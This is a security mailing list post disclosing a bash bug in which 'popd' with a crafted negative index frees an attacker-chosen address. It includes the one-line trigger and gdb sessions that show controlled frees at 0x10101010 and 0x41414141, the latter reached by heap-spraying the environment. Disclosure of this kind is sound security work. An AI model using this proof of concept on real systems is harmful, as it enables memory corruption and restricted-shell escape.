Date: Thu, 17 Nov 2016 12:04:49 -0500 From: Fernando Muñoz <fernando@...l-life.com> To: oss-security@...ts.openwall.com Cc: Chester Ramey <chet.ramey@...e.edu> Subject: bash - popd controlled free bash - popd controlled free ==================== popd can be tricked to free a user supplied address in the following way: $ popd +-111111 This could be used to bypass restricted shells (rsh) on some environments to cause use-after-free. This was already reported to bash devs and only considered a bug, if Mitre consider it could have a security impact, please assign a CVE. Details ====== $ gdb bash ... (gdb) r -c 'popd +-67372036' The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/bashinstrumentado/bash-4.3/bash -c 'popd +-67372036' Program received signal SIGSEGV, Segmentation fault. 0x0827f93a in popd_builtin (list=<optimized out>) at ./pushd.def:384 384 free (pushd_directory_list[i]); (gdb) print pushd_directory_list[i] Cannot access memory at address 0x10101010 ---- $ export AA=`perl -e 'print "A"x100000'` $ gdb ./bash ... (gdb) x/s *((char **)environ+13) 0xbffe75d4: "AA=", 'A' <repeats 197 times>... (gdb) run -c 'popd +-805281142' The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/bash/bash-4.3/bash -c 'popd +-805281142' Program received signal SIGSEGV, Segmentation fault. internal_free (mem=0x41414141, file=0x83fb36c "./pushd.def", line=384, flags=<optimized out>) at malloc.c:863 863 if (p->mh_alloc == ISMEMALIGN) - Fernando
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.